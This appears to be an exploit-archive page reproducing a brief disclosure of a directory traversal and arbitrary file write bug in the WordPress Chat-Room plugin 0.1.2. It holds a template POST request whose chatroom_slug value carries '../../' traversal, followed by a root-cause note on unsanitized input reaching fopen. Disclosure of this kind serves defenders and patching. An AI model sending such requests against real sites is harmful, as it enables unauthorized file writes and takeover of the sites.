Home / exploitsPDF  

WordPress Chat-Room plugin v0.1.2 directory traversal/arbitrary file write

Posted on 30 November -0001

<HTML><HEAD><TITLE>WordPress Chat-Room plugin v0.1.2 directory traversal/arbitrary file write</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Exploit Title: WordPress Chat-Room plugin v0.1.2 directory traversal/arbitrary file write # Date: 2017-03-08 # Exploit Author: malwrforensics # Vendor Homepage: https://webdevstudios.com/ # Software Link: https://wordpress.org/plugins/chat-room/ # Version: 0.1.2 # Tested on: WordPress 4.7.3, Ubuntu 16.04.2 LTS #Folder used by the Chat-room plugin: http://<server>/wp-content/uploads/chatter/ #POST http://<server>/wp-admin/admin-ajax.php HTTP/1.1 #... #Referer: http://<server>/chat-room/<chat_name/ #... # #action=send_message&chatroom_slug=../../<new_path_and_file>&message=test #Vulnerable file: chat-room.php #function save_message(): # - the $chatroom_slug parameter is not sanitized # - the log_filename parameters receives the value of $chatroom_slug # - the write_log_file function is called which will do an fopen($log_filename, 'w') Thanks. </BODY></HTML>

 

TOP